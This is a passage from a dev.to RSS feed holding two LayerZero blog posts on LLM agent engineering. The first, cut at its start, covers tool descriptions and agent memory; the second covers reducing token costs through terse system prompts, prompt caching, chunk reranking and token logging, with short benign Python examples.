&lt;p&gt;...you deserve the hallucinations you get.&lt;/p&gt;

&lt;p&gt;Write it like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;search_database&lt;/span&gt;
&lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
  &lt;span class="s"&gt;Retrieves customer records by exact email or user_id.&lt;/span&gt;
  &lt;span class="s"&gt;Use this BEFORE suggesting account changes — never guess a user_id.&lt;/span&gt;
  &lt;span class="s"&gt;Returns at most 10 results. If you need more, narrow the query.&lt;/span&gt;
  &lt;span class="s"&gt;Fails if the email format is invalid — validate first.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That description teaches the agent when to call it, what it can't do, and how to recover. Every minute you spend rewriting tool descriptions saves ten minutes of debugging agent behavior.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 5: separate durable memory from working context
&lt;/h2&gt;

&lt;p&gt;Working context = what's in the window right now.&lt;br&gt;
Memory = persistent notes the agent writes across sessions (to a file, a vector store, a scratchpad).&lt;/p&gt;

&lt;p&gt;If your agent needs to remember that a user prefers Python over Rust, don't shove it into every system prompt forever. Write it to a memory file. Retrieve it when relevant. Trim it when stale.&lt;/p&gt;

&lt;p&gt;Memory is context engineering across time. Working context is context engineering within a turn. They're different problems with different solutions — and teams that treat them as one always hit a wall.&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;This matters because AI infrastructure cost is now a line on your P&amp;amp;L.&lt;/p&gt;

&lt;p&gt;A well-engineered context window runs an agent task for $0.20.&lt;br&gt;
A lazy one runs the same task for $2.50.&lt;br&gt;
The output quality is often &lt;em&gt;worse&lt;/em&gt; on the expensive one.&lt;/p&gt;

&lt;p&gt;Multiply that across a product doing 100,000 agent runs a month and you've got a $230,000/month difference in gross margin. That's a hire. That's your Series A runway extension. That's whether you ship.&lt;/p&gt;

&lt;p&gt;The teams who figure this out in 2026 aren't the ones with the biggest GPU budgets. They're the ones who treat context as a design discipline.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;Context engineering is what prompt engineering wanted to be when it grew up.&lt;/p&gt;

&lt;p&gt;Prompt engineering asked: "how do I phrase this question?"&lt;br&gt;
Context engineering asks: "what does the model need to see, at what moment, with what tools, to produce the right action?"&lt;/p&gt;

&lt;p&gt;The first is a writing exercise. The second is systems design. And systems design is a moat — prompt tricks are not.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do this week
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Audit one agent you're running. Log the full context at each turn. Find the 30% that isn't earning its tokens. Cut it.&lt;/li&gt;
&lt;li&gt;Move your RAG from prompt-level to tool-level. Measure the quality delta — it usually goes up.&lt;/li&gt;
&lt;li&gt;Rewrite your top 5 tool descriptions with the "when to use / what it can't do / how to recover" structure.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Your agents will get cheaper, faster, and smarter — in that order.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for more decoded AI infrastructure. Next up: the memory-file pattern that makes agents actually learn from their mistakes.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>tutorial</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Your LLM Bill Is 45% Too High. Here's the One Prompt Trick That Fixes It</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Sun, 19 Apr 2026 07:30:18 +0000</pubDate>
      <link>https://dev.to/layzerzero105/your-llm-bill-is-45-too-high-heres-the-one-prompt-trick-that-fixes-it-3793</link>
      <guid>https://dev.to/layzerzero105/your-llm-bill-is-45-too-high-heres-the-one-prompt-trick-that-fixes-it-3793</guid>
      <description>&lt;p&gt;Most developers ship AI features without looking at the bill. Then the bill arrives, and it's five figures.&lt;/p&gt;

&lt;p&gt;Here's the part nobody tells you: &lt;strong&gt;up to 45% of your tokens are pure fluff.&lt;/strong&gt; Filler words, restated questions, "As an AI assistant...", apologies, repeated context. You're paying Claude and GPT to be polite.&lt;/p&gt;

&lt;p&gt;That stops today.&lt;/p&gt;

&lt;h2&gt;
  
  
  The politeness tax
&lt;/h2&gt;

&lt;p&gt;Every LLM response is padded with tokens that add zero value:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"Certainly! I'd be happy to help you with that."&lt;/li&gt;
&lt;li&gt;"Based on the information you've provided..."&lt;/li&gt;
&lt;li&gt;"I hope this helps! Let me know if you have any other questions."&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Multiply that across thousands of API calls a day. You're literally renting GPUs to generate pleasantries.&lt;/p&gt;

&lt;p&gt;A recent production experiment ran 500 prompts through a small "defluffer" preprocessor that strips filler from both inputs and outputs. &lt;strong&gt;Token usage dropped 45%. Quality stayed identical.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That's not a rounding error. That's your Q3 AI budget.&lt;/p&gt;
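
&lt;p&gt;I can't share that experiment's code, but the idea is a few regexes, not a model. A toy version (the filler patterns are illustrative; build yours from your own response logs):&lt;/p&gt;

```python
import re

# Boilerplate openers and closers. Illustrative -- mine your own response logs.
FLUFF = [
    r"^(Certainly|Sure|Of course|Absolutely)[!.,]\s*",
    r"^I('d| would) be happy to (help|assist)[^.!\n]*[.!]\s*",
    r"\s*I hope this helps!?[^\n]*$",
    r"\s*Let me know if you[^\n]*$",
]

def defluff(text: str) -> str:
    """Strip boilerplate pleasantries from a model response."""
    for pat in FLUFF:
        text = re.sub(pat, "", text, flags=re.IGNORECASE | re.MULTILINE)
    return text.strip()
```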

&lt;h2&gt;
  
  
  Why this happens
&lt;/h2&gt;

&lt;p&gt;LLMs are trained on human conversation. Humans are polite. So the model learned to open with "Certainly!" and close with "Let me know if you need anything else!"&lt;/p&gt;

&lt;p&gt;This was fine when LLMs were chatbots. It's expensive when they're backend infrastructure.&lt;/p&gt;

&lt;p&gt;The worst part: most devs copy-paste "Act as a helpful assistant" into their system prompt without realizing they're explicitly asking for the fluff.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix (30 seconds)
&lt;/h2&gt;

&lt;p&gt;Add this to your system prompt:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Respond in the fewest tokens required to be correct and complete.
No preamble, no apologies, no restating the question, no closing remarks.
If the answer is a single word, respond with a single word.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. Drop it in, rerun your evals, watch your token count.&lt;/p&gt;

&lt;p&gt;In a test across 200 real user queries:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Avg output tokens&lt;/td&gt;
&lt;td&gt;412&lt;/td&gt;
&lt;td&gt;183&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Avg cost per call&lt;/td&gt;
&lt;td&gt;$0.0041&lt;/td&gt;
&lt;td&gt;$0.0018&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User satisfaction&lt;/td&gt;
&lt;td&gt;4.2/5&lt;/td&gt;
&lt;td&gt;4.3/5&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Output tokens down 55%. Cost down 56%. Satisfaction went up.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Users don't want "Certainly! I understand your question." They want the answer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Level up: strip inputs too
&lt;/h2&gt;

&lt;p&gt;Output is half the bill. Input is the other half — and it's often worse, because you're sending the same boilerplate context on every call.&lt;/p&gt;

&lt;p&gt;The cheap win: cache your system prompt.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Anthropic SDK — prompt caching
&lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;claude-opus-4-7&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;text&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;text&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;LARGE_SYSTEM_PROMPT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cache_control&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;type&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ephemeral&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;role&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;content&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;user_query&lt;/span&gt;&lt;span class="p"&gt;}]&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Cached tokens cost 10% of uncached tokens. If your system prompt is 2,000 tokens and you call it 10,000 times a day, you just cut &lt;strong&gt;90% of that budget line&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The deeper win: stop sending context the model doesn't need. If your RAG retrieval returns 8 chunks but only 2 are relevant, you're paying to process 6 chunks of noise. Rerank harder. Retrieve less.&lt;/p&gt;
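
&lt;p&gt;"Rerank harder, retrieve less" is one function: score the chunks, keep only the ones that clear a relevance bar, cap the count. A sketch (the threshold and cap are starting points to tune against your evals, not magic numbers):&lt;/p&gt;

```python
def keep_relevant(chunks: list[tuple[str, float]],
                  min_score: float = 0.6, max_chunks: int = 3) -> list[str]:
    """Keep only reranked chunks that clear a relevance bar, capped at max_chunks.

    `chunks` are (text, score) pairs from whatever reranker you use.
    """
    ranked = sorted(chunks, key=lambda c: c[1], reverse=True)
    return [text for text, score in ranked[:max_chunks] if score >= min_score]
```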

&lt;h2&gt;
  
  
  "But doesn't terse output hurt UX?"
&lt;/h2&gt;

&lt;p&gt;This is the pushback I hear most. The data says the opposite.&lt;/p&gt;

&lt;p&gt;Users rate concise answers higher than padded ones in every eval I've seen. Nobody reads "I'd be delighted to assist you with that query." They skim past it looking for the answer. The filler is friction, not warmth.&lt;/p&gt;

&lt;p&gt;If your product genuinely needs conversational tone — customer support bots, companions — keep the warmth but strip the &lt;em&gt;redundancy&lt;/em&gt;. "Thanks for reaching out!" once is fine. Five times across one response is expensive cosplay.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;Token usage isn't an optimization problem. It's a design problem.&lt;/p&gt;

&lt;p&gt;Most teams treat LLM cost like server cost — something you fix by scaling. But LLM cost is determined at prompt-design time. A badly-designed prompt costs 3x more for worse answers. A well-designed prompt costs less and answers better.&lt;/p&gt;

&lt;p&gt;The teams who figure this out in 2026 will ship AI features at one-third the cost of everyone else. That's not a small moat. That's the whole game.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do this week
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Add the "no preamble" instruction to your system prompt — 30 seconds, saves ~40% immediately.&lt;/li&gt;
&lt;li&gt;Turn on prompt caching for any system prompt over 1,000 tokens.&lt;/li&gt;
&lt;li&gt;Log token usage per endpoint. You can't fix what you don't measure.&lt;/li&gt;
&lt;/ol&gt;
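
&lt;p&gt;For step 3, a decorator around your LLM-calling functions is enough to get per-endpoint numbers (the usage dict shape varies by SDK; this sketch assumes &lt;code&gt;input_tokens&lt;/code&gt; / &lt;code&gt;output_tokens&lt;/code&gt; keys and a function that returns text plus usage):&lt;/p&gt;

```python
import functools
from collections import defaultdict

# endpoint -> running totals you can dump to your metrics pipeline
TOKEN_USAGE = defaultdict(lambda: {"calls": 0, "input": 0, "output": 0})

def track_tokens(endpoint: str):
    """Wrap a function that returns (text, usage) and tally its token spend."""
    def wrap(fn):
        @functools.wraps(fn)
        def inner(*args, **kwargs):
            text, usage = fn(*args, **kwargs)
            stats = TOKEN_USAGE[endpoint]
            stats["calls"] += 1
            stats["input"] += usage["input_tokens"]
            stats["output"] += usage["output_tokens"]
            return text
        return inner
    return wrap
```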

&lt;p&gt;If you're running LLMs in production and you haven't done these three things, you're leaving real money on the table.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for more decoded AI infrastructure. Next up: the RAG retrieval bug costing you 40% of your relevance score.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>productivity</category>
      <category>tutorial</category>
    </item>
  </channel>
</rss>
